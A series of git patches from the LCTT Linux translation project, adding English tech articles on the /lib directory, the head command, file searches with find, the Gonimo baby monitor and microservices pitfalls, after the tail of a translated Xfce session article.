- [CLIENT_LEADER] 0x200000f
- [RES_NAME] xterm
- [RES_CLASS] XTerm
- [WM_NAME] xterm
- [WM_COMMAND] (1) "xterm"
- [GEOMETRY] (860,35,817,1042)
- [GEOMETRY-MAXIMIZED] (860,35,817,1042)
- [SCREEN] 0
- [DESK] 2
- [FLAGS] 0x0
-
-```
-
-注意这里的 geometry 和 desk 记录的正是我们想要的窗口位置以及工作区号。因此不能保存窗口位置的原因就是因为缺少这个文件。
-
-继续深入下去,我发现当你明确地手工保存 sessino 时,智慧保存第一个文件而不会保存第二个文件。 但是当登出保存 session 时则会保存第二个文件。 因此, 我进入 Settings -> Session and Startup 中,在 Genral 标签页中启用登出时自动保存 session, 然后登出后再进来, 然后 tada, 第二个文件出现了。 再然后我又关闭了登出时自动保存 session。( 因为我一般在排好屏幕后就保存一个 session, 但是我不希望做出的改变也会影响到这个保存的 session, 如有必要我会明确地手工进行保存), 现在 我的窗口位置能够正常的回复了。
-
-这也解释了为什么有的人会有问题而有的人没有问题: 有的人可能一直都是用登出按钮重启,而有些人则是手工重启(或者仅仅是由于系统漰溃了才重启)。
-
-顺带一提,这类问题, 以及为解决问题而付出的努力正是我赞同为软件存储的状态文件编写 man 页或其他类似文档的原因。 为用户编写文档,不仅能帮助别人深入挖掘产生奇怪问题的原因, 也能让软件作者注意到软件中那些奇怪的东西, 比如将 session 状态存储到两个独立的文件中去。
-
-
---------------------------------------------------------------------------------
-
-via: https://www.eyrie.org/~eagle/journal/2017-12/001.html
-
-作者:[J. R. R. Tolkien][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.eyrie.org
From 2bdb2ab1fe8d53c5121e2dce9ed4fac26b612f7e Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:21:29 +0800
Subject: [PATCH 062/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20directory?=
=?UTF-8?q?=20structure:=20/lib=20explained?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nux directory structure- -lib explained.md | 77 +++++++++++++++++++
1 file changed, 77 insertions(+)
create mode 100644 sources/tech/20170927 Linux directory structure- -lib explained.md
diff --git a/sources/tech/20170927 Linux directory structure- -lib explained.md b/sources/tech/20170927 Linux directory structure- -lib explained.md
new file mode 100644
index 0000000000..3f8322d630
--- /dev/null
+++ b/sources/tech/20170927 Linux directory structure- -lib explained.md
@@ -0,0 +1,77 @@
+Linux directory structure: /lib explained
+======
+[![lib folder linux][1]][1]
+
+We already explained other important system folders like /bin, /boot, /dev, /etc etc folders in our previous posts. Please check below links for more information about other stuff which you are interested. In this post, we will see what is /lib folder all about.
+
+[**Linux Directory Structure explained: /bin folder**][2]
+
+[**Linux Directory Structure explained: /boot folder**][3]
+
+[**Linux Directory Structure explained: /dev folder**][4]
+
+[**Linux Directory Structure explained: /etc folder**][5]
+
+[**Linux Directory Structure explained: /lost+found folder**][6]
+
+[**Linux Directory Structure explained: /home folder**][7]
+
+### What is /lib folder in Linux?
+
+The lib folder is a **library files directory** which contains all helpful library files used by the system. In simple terms, these are helpful files which are used by an application or a command or a process for their proper execution. The commands in /bin or /sbin dynamic library files are located just in this directory. The kernel modules are also located here.
+
+Taken an example of executing pwd command. It requires some library files to execute properly. Let us prove what is happening with pwd command when executing. We will use [the strace command][8] to figure out which library files are used.
+
+Example:
+
+If you observe, We just used open kernel call for pwd command. The pwd command to execute properly it will require two lib files.
+
+Contents of /lib folder in Linux
+
+As said earlier this folder contains object files and libraries, it's good to know some important subfolders with this directory. And below content are for my system and you may see some variants in your system.
+
+**/lib/firmware** - This is a folder which contains hardware firmware code.
+
+### What is the difference between firmware and drivers?
+
+Many devices software consists of two software piece to make that hardware properly. The piece of code that is loaded into actual hardware is firmware and the software which communicate between this firmware and kernel is called drivers. This way the kernel directly communicate with hardware and make sure hardware is doing the work assigned to it.
+
+**/lib/modprobe.d** - Configuration directory for modprobe command
+
+**/lib/modules** - All loadable kernel modules are stored in this directory. If you have more kernels you will see folders within this directory each represents a kernel.
+
+**/lib/hdparm** - Contains SATA/IDE parameters for disks to run properly.
+
+**/lib/udev** - Userspace /dev is a device manager for Linux Kernel. This folder contains all udev related files/folders like rules.d folder which contain udev specific rules.
+
+### The /lib folder sister folders: /lib32 and /lib64
+
+These folders contain their specific architecture library files. These folders are almost identical to /lib folder expects architecture level differences.
+
+### Other library folders in Linux
+
+**/usr/lib** - All software libraries are installed here. This does not contain system default or kernel libraries.
+
+**/usr/local/lib** - To place extra system library files here. These library files can be used by different applications.
+
+**/var/lib** - Holds dynamic data libraries/files like the rpm/dpkg database and game scores.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxnix.com/linux-directory-structure-lib-explained/
+
+作者:[Surendra Anne][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxnix.com/author/surendra/
+[1]:https://www.linuxnix.com/wp-content/uploads/2017/09/The-lib-folder-explained.png
+[2]:https://www.linuxnix.com/linux-directory-structure-explained-bin-folder/
+[3]:https://www.linuxnix.com/linux-directory-structure-explained-boot-folder/
+[4]:https://www.linuxnix.com/linux-directory-structure-explained-dev-folder/
+[5]:https://www.linuxnix.com/linux-directory-structure-explainedetc-folder/
+[6]:https://www.linuxnix.com/lostfound-directory-linuxunix/
+[7]:https://www.linuxnix.com/linux-directory-structure-home-root-folders/
+[8]:https://www.linuxnix.com/10-strace-command-examples-linuxunix/
From 0a4a7e653fedc77dc7f0fabff07af2319ec31ce6 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:23:36 +0800
Subject: [PATCH 063/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20Head=20Co?=
=?UTF-8?q?mmand=20Explained=20for=20Beginners=20(5=20Examples)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Explained for Beginners (5 Examples).md | 103 ++++++++++++++++++
1 file changed, 103 insertions(+)
create mode 100644 sources/tech/20170927 Linux Head Command Explained for Beginners (5 Examples).md
diff --git a/sources/tech/20170927 Linux Head Command Explained for Beginners (5 Examples).md b/sources/tech/20170927 Linux Head Command Explained for Beginners (5 Examples).md
new file mode 100644
index 0000000000..74d4655bba
--- /dev/null
+++ b/sources/tech/20170927 Linux Head Command Explained for Beginners (5 Examples).md
@@ -0,0 +1,103 @@
+Linux Head Command Explained for Beginners (5 Examples)
+======
+
+Sometimes, while working on the command line in Linux, you might want to take a quick look at a few initial lines of a file. For example, if a log file is continuously being updated, the requirement could be to view, say, first 10 lines of the log file every time. While viewing the file in an editor (like [vim][1]) is always an option, there exists a command line tool - dubbed **head** \- that lets you view initial few lines of a file very easily.
+
+In this article, we will discuss the basics of the head command using some easy to understand examples. Please note that all steps/instructions mentioned here have been tested on Ubuntu 16.04LTS.
+
+### Linux head command
+
+As already mentioned in the beginning, the head command lets users view the first part of files. Here's its syntax:
+
+head [OPTION]... [FILE]...
+
+And following is how the command's man page describes it:
+```
+Print the first 10 lines of each FILE to standard output. With more than one FILE, precede each
+with a header giving the file name.
+```
+
+The following Q&A-type examples should give you a better idea of how the tool works:
+
+### Q1. How to print the first 10 lines of a file on terminal (stdout)?
+
+This is quite easy using head - in fact, it's the tool's default behavior.
+
+head [file-name]
+
+The following screenshot shows the command in action:
+
+[![How to print the first 10 lines of a file][2]][3]
+
+### Q2. How to tweak the number of lines head prints?
+
+While 10 is the default number of lines the head command prints, you can change this number as per your requirement. The **-n** command line option lets you do that.
+
+head -n [N] [File-name]
+
+For example, if you want to only print first 5 lines, you can convey this to the tool in the following way:
+
+head -n 5 file1
+
+[![How to tweak number of lines head prints][4]][5]
+
+### Q3. How to restrict the output to a certain number of bytes?
+
+Not only number of lines, you can also restrict the head command output to a specific number of bytes. This can be done using the **-c** command line option.
+
+head -c [N] [File-name]
+
+For example, if you want head to only display first 25 bytes, here's how you can execute it:
+
+head -c 25 file1
+
+[![restrict the output to a certain number of bytes][6]][7]
+
+So you can see that the tool displayed only the first 25 bytes in the output.
+
+Please note that [N] "may have a multiplier suffix: b 512, kB 1000, K 1024, MB 1000*1000, M 1024*1024, GB 1000*1000*1000, G 1024*1024*1024, and so on for T, P, E, Z, Y."
+
+### Q4. How to have head print filename in output?
+
+If for some reason, you want the head command to also print the file name in output, you can do that using the **-v** command line option.
+
+head -v [file-name]
+
+Here's an example:
+
+[![How to have head print filename in output][8]][9]
+
+So as you can see, the filename 'file 1' was displayed in the output.
+
+### Q5. How to have NUL as line delimiter, instead of newline?
+
+By default, the head command output is delimited by newline. But there's also an option of using NUL as the delimiter. The option **-z** or **\--zero-terminated** lets you do this.
+
+head -z [file-name]
+
+### Conclusion
+
+As most of you'd agree, head is a simple command to understand and use, meaning there's little learning curve associated with it. The features (in terms of command line options) it offers are also limited, and we've covered almost all of them. So give these options a try, and when you're done, take a look at the command's [man page][10] to know more.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-head-command/
+
+作者:[Himanshu Arora][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/vim-basics
+[2]:https://www.howtoforge.com/images/linux_head_command/head-basic-usage.png
+[3]:https://www.howtoforge.com/images/linux_head_command/big/head-basic-usage.png
+[4]:https://www.howtoforge.com/images/linux_head_command/head-n-option.png
+[5]:https://www.howtoforge.com/images/linux_head_command/big/head-n-option.png
+[6]:https://www.howtoforge.com/images/linux_head_command/head-c-option.png
+[7]:https://www.howtoforge.com/images/linux_head_command/big/head-c-option.png
+[8]:https://www.howtoforge.com/images/linux_head_command/head-v-option.png
+[9]:https://www.howtoforge.com/images/linux_head_command/big/head-v-option.png
+[10]:https://linux.die.net/man/1/head
From 6f2167bc9ed7ae71baa3c157fc4b111d9fdbf029 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:26:36 +0800
Subject: [PATCH 064/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Mastering=20file?=
=?UTF-8?q?=20searches=20on=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...170921 Mastering file searches on Linux.md | 222 ++++++++++++++++++
1 file changed, 222 insertions(+)
create mode 100644 sources/tech/20170921 Mastering file searches on Linux.md
diff --git a/sources/tech/20170921 Mastering file searches on Linux.md b/sources/tech/20170921 Mastering file searches on Linux.md
new file mode 100644
index 0000000000..80fde0f7f0
--- /dev/null
+++ b/sources/tech/20170921 Mastering file searches on Linux.md
@@ -0,0 +1,222 @@
+Mastering file searches on Linux
+======
+
+![](https://images.idgesg.net/images/article/2017/09/telescope-100736548-large.jpg)
+
+There are many ways to search for files on Linux systems and the commands can be very easy or very specific -- narrowing down your search criteria to find what just you're looking for and nothing else. In today's post, we're going to examine some of the most useful commands and options for your file searches. We're going to look into:
+
+ * Quick finds
+ * More complex search criteria
+ * Combining conditions
+ * Reversing criteria
+ * Simple vs. detailed responses
+ * Looking for duplicate files
+
+
+
+There are actually several useful commands for searching for files. The **find** command may be the most obvious, but it's not the only command or always the fastest way to find what you're looking for.
+
+### Quick file search commands: which and locate
+
+The simplest commands for searching for files are probably **which** and **locate**. Both have some constraints that you should be aware of. The **which** command is only going to search through directories on your search path looking for files that are executable. It is generally used to identify commands. If you are curious about what command will be run when you type "which", for example, you can use the command "which which" and it will point you to the executable.
+```
+$ which which
+/usr/bin/which
+
+```
+
+The **which** command will display the first executable that it finds with the name you supply (i.e., the one you would run if you use that command) and then stop.
+
+The **locate** command is a bit more generous. However, it has a constraint, as well. It will find any number of files, but only if the file names are contained in a database prepared by the **updatedb** command. That file will likely be stored in some location like /var/lib/mlocate/mlocate.db, but is not intended to be read by anything other than the locate command. Updates to this file are generally made by updatedb running daily through cron.
+
+Simple **find** commands don't require a lot more effort, but they do require a starting point for the search and some kind of search criteria. The simplest find command -- one that searches for files by name -- might look like this:
+```
+$ find . -name runme
+./bin/runme
+
+```
+
+Searching from the current position in the file system by file name as shown will also involve searching all subdirectories unless a search depth is specified.
+
+### More than just file names
+
+The **find** command allows you to search on a number of criteria beyond just file names. These include file owner, group, permissions, size, modification time, lack of an active owner or group and file type. And you can do things beyond just locating the files. You can delete them, rename them, change ownership, change permissions, or run nearly any command against the located files.
+
+These two commands would find 1) files owned by root within the current directory and 2) files _not_ owned by the specified user (in this case, shs). In this case, both responses are the same, but they won't always be.
+```
+$ find . -user root -ls
+ 396926 0 lrwxrwxrwx 1 root root 21 Sep 21 09:03 ./xyz -> /home/peanut/xyz
+$ find . ! -user shs -ls
+ 396926 0 lrwxrwxrwx 1 root root 21 Sep 21 09:03 ./xyz -> /home/peanut/xyz
+
+```
+
+The ! character represents "not" -- reversing the condition that follows it.
+
+The command below finds files that have a particular set of permissions.
+```
+$ find . -perm 750 -ls
+ 397176 4 -rwxr-x--- 1 shs shs 115 Sep 14 13:52 ./ll
+ 398209 4 -rwxr-x--- 1 shs shs 117 Sep 21 08:55 ./get-updates
+ 397145 4 drwxr-x--- 2 shs shs 4096 Sep 14 15:42 ./newdir
+
+```
+
+This command displays files with 777 permissions that are _not_ symbolic links.
+```
+$ sudo find /home -perm 777 ! -type l -ls
+ 397132 4 -rwxrwxrwx 1 shs shs 18 Sep 15 16:06 /home/shs/bin/runme
+ 396949 4 -rwxrwxrwx 1 root root 558 Sep 21 11:21 /home/oops
+
+```
+
+The following command looks for files that are larger than a gigabyte in size. And notice that we've located a very interesting file. It represents the physical memory of this system in the ELF core file format.
+```
+$ sudo find / -size +1G -ls
+4026531994 0 -r-------- 1 root root 140737477881856 Sep 21 11:23 /proc/kcore
+ 1444722 15332 -rw-rw-r-- 1 shs shs 1609039872 Sep 13 15:55 /home/shs/Downloads/ubuntu-17.04-desktop-amd64.iso
+
+```
+
+Finding files by file type is easy as long as you know how the file types are described for the find command.
+```
+b = block special file
+c = character special file
+d = directory
+p = named pipe
+f = regular file
+l = symbolic link
+s = socket
+D = door (Solaris only)
+
+```
+
+In the commands below, we are looking for symbolic links and sockets.
+```
+$ find . -type l -ls
+ 396926 0 lrwxrwxrwx 1 root root 21 Sep 21 09:03 ./whatever -> /home/peanut/whatever
+$ find . -type s -ls
+ 395256 0 srwxrwxr-x 1 shs shs 0 Sep 21 08:50 ./.gnupg/S.gpg-agent
+
+```
+
+You can also search for files by inode number.
+```
+$ find . -inum 397132 -ls
+ 397132 4 -rwx------ 1 shs shs 18 Sep 15 16:06 ./bin/runme
+
+```
+
+Another way to search for files by inode involves using the **debugfs** command. On a large file system, this command might be considerably faster than using find. You may need to install icheck.
+```
+$ sudo debugfs -R 'ncheck 397132' /dev/sda1
+debugfs 1.42.13 (17-May-2015)
+Inode Pathname
+397132 /home/shs/bin/runme
+
+```
+
+In the following command, we're starting in our home directory (~), limiting the depth of our search (how deeply we'll search subdirectories) and looking only for files that have been created or modified within the last day (mtime setting).
+```
+$ find ~ -maxdepth 2 -mtime -1 -ls
+ 407928 4 drwxr-xr-x 21 shs shs 4096 Sep 21 12:03 /home/shs
+ 394006 8 -rw------- 1 shs shs 5909 Sep 21 08:18 /home/shs/.bash_history
+ 399612 4 -rw------- 1 shs shs 53 Sep 21 08:50 /home/shs/.Xauthority
+ 399615 4 drwxr-xr-x 2 shs shs 4096 Sep 21 09:32 /home/shs/Downloads
+
+```
+
+### More than just listing files
+
+With an **-exec** option, the find command allows you to change files in some way once you've found them. You simply need to follow the -exec option with the command you want to run.
+```
+$ find . -name runme -exec chmod 700 {} \;
+$ find . -name runme -ls
+ 397132 4 -rwx------ 1 shs shs 18 Sep 15 16:06 ./bin/runme
+
+```
+
+In this command, {} represents the name of the file. This command would change permissions on any files named "runme" in the current directory and subdirectories.
+
+Put whatever command you want to run following the -exec option and using a syntax similar to what you see above.
+
+### Other search criteria
+
+As shown in one of the examples above, you can also search by other criteria -- file age, owner, permissions, etc. Here are some examples.
+
+#### Finding by user
+```
+$ sudo find /home -user peanut
+/home/peanut
+/home/peanut/.bashrc
+/home/peanut/.bash_logout
+/home/peanut/.profile
+/home/peanut/examples.desktop
+
+```
+
+#### Finding by file permissions
+```
+$ sudo find /home -perm 777
+/home/shs/whatever
+/home/oops
+
+```
+
+#### Finding by age
+```
+$ sudo find /home -mtime +100
+/home/shs/.mozilla/firefox/krsw3giq.default/gmp-gmpopenh264/1.6/gmpopenh264.info
+/home/shs/.mozilla/firefox/krsw3giq.default/gmp-gmpopenh264/1.6/libgmpopenh264.so
+
+```
+
+#### Finding by age comparison
+
+Commands like this allow you to find files newer than some other file.
+```
+$ sudo find /var/log -newer /var/log/syslog
+/var/log/auth.log
+
+```
+
+### Finding duplicate files
+
+If you're looking to clean up disk space, you might want to remove large duplicate files. The best way to determine whether files are truly duplicates is to use the **fdupes** command. This command uses md5 checksums to determine if files have the same content. With the -r (recursive) option, fdupes will run through a directory and find files that have the same checksum and are thus identical in content.
+
+If you run a command like this as root, you will likely find a lot of duplicate files, but many will be startup files that were added to home directories when they were created.
+```
+# fdupes -rn /home > /tmp/dups.txt
+# more /tmp/dups.txt
+/home/jdoe/.profile
+/home/tsmith/.profile
+/home/peanut/.profile
+/home/rocket/.profile
+
+/home/jdoe/.bashrc
+/home/tsmith/.bashrc
+/home/peanut/.bashrc
+/home/rocket/.bashrc
+
+```
+
+Similarly, you might find a lot of duplicate configuration files in /usr that you shouldn't remove. So, be careful with the fdupes output.
+
+The fdupes command isn't always speedy, but keeping in mind that it's running checksum queries over a lot of files to compare them, you'll probably appreciate how efficient it is.
+
+### Wrap-up
+
+There are lots of way to locate files on Linux systems. If you can describe what you're looking for, one of the commands above will help you find it.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3227075/linux/mastering-file-searches-on-linux.html
+
+作者:[Sandra Henry-Stocker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
From 528871b714efda5b98fde6d2799ad91caa09447a Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:28:47 +0800
Subject: [PATCH 065/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20create?=
=?UTF-8?q?=20a=20free=20baby=20monitoring=20system=20with=20Gonimo?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...free baby monitoring system with Gonimo.md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 sources/tech/20170928 How to create a free baby monitoring system with Gonimo.md
diff --git a/sources/tech/20170928 How to create a free baby monitoring system with Gonimo.md b/sources/tech/20170928 How to create a free baby monitoring system with Gonimo.md
new file mode 100644
index 0000000000..0b68b7967a
--- /dev/null
+++ b/sources/tech/20170928 How to create a free baby monitoring system with Gonimo.md
@@ -0,0 +1,135 @@
+How to create a free baby monitoring system with Gonimo
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/baby.png?itok=7jyDs9vE)
+
+New and expecting parents quickly learn that there is a long--and expensive--list of equipment that a new baby needs. High on that list is a baby monitor, so they can keep an eye (and an ear) on their infant while they're doing other things. But this is one piece of equipment that doesn't have to eat into your baby fund; Gonimo is a free and open source solution that turns existing devices into a baby monitoring system, freeing up some of your baby budget for any of the thousands of other must-have or trendy items lining the aisles of the nearby big-box baby store.
+
+Gonimo was born when its developer, an open source fan, had twins and found problems with the existing options:
+
+ * Status-quo hardware baby monitors are expensive, have limited range, and require you to carry extra devices.
+ * There are mobile monitoring apps, but most of the existing iOS/Android baby monitoring apps are unreliable and unsecure, with no obvious open source product in sight.
+ * If you have two young children (e.g., twins), you'll need two monitors, doubling your costs.
+
+
+
+Gonimo was created as an open source solution to the shortcomings of typical monitors:
+
+ * Expensive? Nope, it is free!
+ * Limited range? No, it works with internet/WiFi, wherever you are.
+ * Download and install apps? Uh-uh, it works in your existing web browser.
+ * Buy new devices? No way, you can use any laptop, mobile phone, or tablet with a web browser and a microphone and/or camera.
+
+
+
+(Note: Apple iOS devices are unfortunately not yet supported, but that's expected to change very soon--read on for how you can help make that happen.)
+
+### Get started
+
+Transforming your devices into a baby monitor is easy. From your device's browser (ideally Chrome), visit [gonimo.com][1] and click Start baby monitor to get to the web app.
+
+ 1. **Create family:** On the first-time startup screen, you will see a cute rabbit running on the globe. This is where you create a new family. Hit the **+** button and either accept the randomly generated family name or type in your own choice.
+
+
+
+![Start screen][3]
+
+
+Create a new family from the start screen
+
+ 1. **Invite devices:** After you've set up your family, the next screen directs you to invite another device to join your Gonimo family. There is a one-time invitation link that you can directly send via email or copy and paste into a message. From the other device, simply open the link and accept the invitation. Repeat this process for any other devices you'd like to invite to your family. Your devices are now in the same family, ready to cooperate as a fully working baby monitor system.
+
+
+
+![Invite screen][5]
+
+
+Invite family members
+
+ 1. **Start baby station stream:** Next, choose which device will stream the baby's audio and video to the parent station by going to the [Gonimo home screen][6], clicking on the button with the pacifier, and giving the web browser permission to access the device's microphone and camera. Adjust the camera to point at your baby's bed, or turn it off to save device battery (audio will still be streamed). Hit Start. The stream is now active.
+
+
+
+![Select baby station][8]
+
+
+Select the baby station
+
+![Press Start][10]
+
+
+Press Start to stream video.
+
+ 1. **Connect to parent station stream:** To view the baby station stream, go to another device in your Gonimo family --this is the parent station. Hit the "parent" button on the Gonimo home screen. You will see a list of all the devices in the family; next to the one with the active baby station will be a pulsing Connect button. Select Connect, and you can see and hear your baby over a peer-to-peer audio/video stream. A volume bar provides visualization for the transmitted audio stream.
+
+
+
+![Select parent station][12]
+
+
+Select parent station
+
+![Press Connect][14]
+
+
+Press Connect to start viewing the baby stream.
+
+ 1. **Congratulations!** You have successfully transformed your devices into a baby monitor directly over a web browser without downloading or installing any apps!
+
+
+
+For more information and detailed descriptions about renaming devices, removing devices from a family, or deleting a family, check out the [video tutorial][15] at gonimo.com.
+
+### Flexibility of the family system
+
+One of Gonimo's strengths is its family-based system, which offers enormous flexibility for different kinds of situations that aren't available even in commercial Android or iOS apps. To dive into these features, let's assume that you have created a family that consists of three devices.
+
+ * **Multi-baby:** What if you want to keep an eye on your two young children who sleep in separate rooms? Put a device in each child's room and set them as baby stations. The third device will act as the parent station, on which you can connect to both streams and see your toddlers via split screen. You can even extend this use case to more than two baby stations by inviting more devices to your family and setting them up as baby stations. As soon as your parent station is connected to the first baby station, return to the Device Overview screen by clicking the back arrow in the top left corner. Now you can connect to the second (and, in turn, the third, and fourth, and fifth, and so on) device, and the split screen will be established automatically. Voila!
+
+
+ * **Multi-parent:** What if daddy wants to watch the children while he's at work? Just invite a fourth device (e.g., his office PC) to the family and set it up as a parent station. Both parents can check in on their children simultaneously from their own devices, even independently choosing to which stream(s) they wish to connect.
+
+
+ * **Multi-family:** A single device can also be part of several families. This is very useful when your baby station is something that's always with you, such as a tablet, and you frequently visit relatives or friends. Create another family for "Granny's house" or "Uncle John's house," which consists of your baby station device paired with Granny's or Uncle John's devices. You can switch the baby station device among those families, whenever you want, from the baby station device's Gonimo home screen.
+
+
+
+### Want to participate?
+
+The Gonimo team loves open source. Code from the community, for the community. Gonimo's users are very important to us, but they are only one part of the Gonimo story. Creative brains behind the scenes are the key to creating a great baby monitor experience.
+
+Currently we especially need help from people who are willing to be iOS 11 testers, as Apple's support of WebRTC in iOS 11 means we will finally be able to support iOS devices. If you can, please help us realize this awesome milestone.
+
+If you know Haskell or want to learn it, you can check out [our code at GitHub][16]. Pull requests, code reviews, and issues are all welcome.
+
+And, finally, please help by spreading the word to new parents and the open source world that the Gonimo baby monitor is simple to use and already in your pocket.
+
+### About The Author
+Robert Klotzner;I Am Father Of Twins;A Programmer. Once I Heard That Ordinary People Can Actually Program Computers;I Bought A Page Book About C;Started Learning;I Was Fifteen Back Then. I Sticked With C;For Quite A While;Learned Java;Went Back To C
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/9/gonimo
+
+作者:[Robert Klotzner][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/robert-klotzner
+[1]:https://gonimo.com/
+[2]:/file/371256
+[3]:https://opensource.com/sites/default/files/u128651/start-screen.png (Start screen)
+[4]:/file/371236
+[5]:https://opensource.com/sites/default/files/u128651/invite-screen.png (Invite screen)
+[6]:https://app.gonimo.com/
+[7]:/file/371231
+[8]:https://opensource.com/sites/default/files/u128651/baby-select.png (Select baby station)
+[9]:/file/371226
+[10]:https://opensource.com/sites/default/files/u128651/baby-screen.png (Press Start)
+[11]:/file/371251
+[12]:https://opensource.com/sites/default/files/u128651/parent-select.png (Select parent station)
+[13]:/file/371241
+[14]:https://opensource.com/sites/default/files/u128651/parent-screen.png (Press Connect)
+[15]:https://gonimo.com/index.php#intro
+[16]:https://github.com/gonimo/gonimo
From 1444d1c4bae61fc4c91118ffb6c85a67a998ee90 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 12:30:52 +0800
Subject: [PATCH 066/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Microservices=20a?=
=?UTF-8?q?nd=20containers:=205=20pitfalls=20to=20avoid?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ces and containers- 5 pitfalls to avoid.md | 80 +++++++++++++++++++
1 file changed, 80 insertions(+)
create mode 100644 sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
diff --git a/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
new file mode 100644
index 0000000000..e92ee3f89a
--- /dev/null
+++ b/sources/tech/20170927 Microservices and containers- 5 pitfalls to avoid.md
@@ -0,0 +1,80 @@
+Microservices and containers: 5 pitfalls to avoid
+======
+
+![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO%20Containers%20Ecosystem.png?itok=lDTaYXzk)
+
+Because microservices and containers are a [match made in heaven][1], it might seem like nothing could go wrong. Let's get these babies into production as quickly as possible, then kick back and wait for the IT promotions and raises to start flooding in. Right?
+
+(We'll pause while the laughter subsides.)
+
+Yeah, sorry. That's just not how it works. While the two technologies can be a powerful combination, realizing their potential doesn't happen without some effort and planning. In previous posts, we've tackled what you should [know at the start][2]. But what about the most common problems organizations encounter when they run microservices in containers?
+
+Knowing these potential snafus in advance can help you avoid them and lay a more solid foundation for success.
+
+It starts with being realistic about your organization's needs, knowledge, resources, and more. "One common [mistake] is to try to adopt everything at once," says Mac Browning, engineering manager at [DigitalOcean][3]. "Be realistic about how your company adopts containers and microservices."
+
+**[ Struggling to explain microservices to your bosses and colleagues? Read our primer on[how to explain microservices in plain English][4]. ]**
+
+Browning and other IT pros shared five pitfalls they see organizations encounter with containerized microservices, especially early in their production lifespan. Knowing them will help you develop your own realistic organizational assessment as you build your strategy for microservices and containers.
+
+### 1. Trying to learn both from scratch simultaneously
+
+If you're just starting to move away from 100% monolithic applications, or if your organization doesn't already a deep knowledge base for containers or microservices, remember this: Microservices and containers aren't actually tethered to one another. That means you can develop your in-house expertise with one before adding the other. Kevin McGrath, senior CTO architect at [Sungard Availability Services][5], recommends building up your team's knowledge and skills with containers first, by containerizing existing or new applications, and then moving to a microservices architecture where beneficial in a later phase.
+
+"Companies that run microservices extremely well got there through years of iteration that gave them the ability to move fast," McGrath says. "If the organization cannot move fast, microservices are going to be difficult to support. Learn to move fast, which containers can help with, then worry about killing the monolith."
+
+### 2. Starting with a customer-facing or mission-critical application
+
+A related pitfall for organizations just getting started with containers, microservices, or both: Trying to tame the lion in the monolithic jungle before you've gotten some practice with some animals lower on the food chain.
+
+Expect some missteps along your team's learning curve - do you want those made with a critical customer-facing application or, say, a lower-stakes service visible only to IT or other internal teams?
+
+"If the entire ecosystem is new, then adding their use into lower-impact areas like your continuous integration system or internal tools may be a low-risk way to gain some operational expertise [with containers and microservices," says Browning of DigitalOcean. "As you gain experience, you'll naturally find new places you can leverage these technologies to deliver a better product to your customers. The fact is, things will go wrong, so plan for them in advance."
+
+### 3. Introducing too much complexity without the right team in place
+
+As your microservices architecture scales, it can generate complex management needs.
+
+As [Red Hat][6] technology evangelist [Gordon Haff][7] recetly wrote, "An OCI-compliant container runtime by itself is very good at managing single containers. However, when you start using more and more containers and containerized apps, broken down into hundreds of pieces, management and orchestration gets tricky. Eventually, you need to take a step back and group containers to deliver services - such as networking, security, and telemetry - across your containers."
+
+"Furthermore, because containers are portable, it's important that the management stack that's associated with them be portable as well," Haff notes. "That's where orchestration technologies like [Kubernetes][8] come in, simplifying this need for IT." (See the full article by Haff: [5 advantages of containers for writing applications][1]. )
+
+In addition, you need the right team in place. If you're already a [DevOps shop][9], you might be particularly well-suited for the transition. Regardless, put a cross-section of people at the table from the start.
+
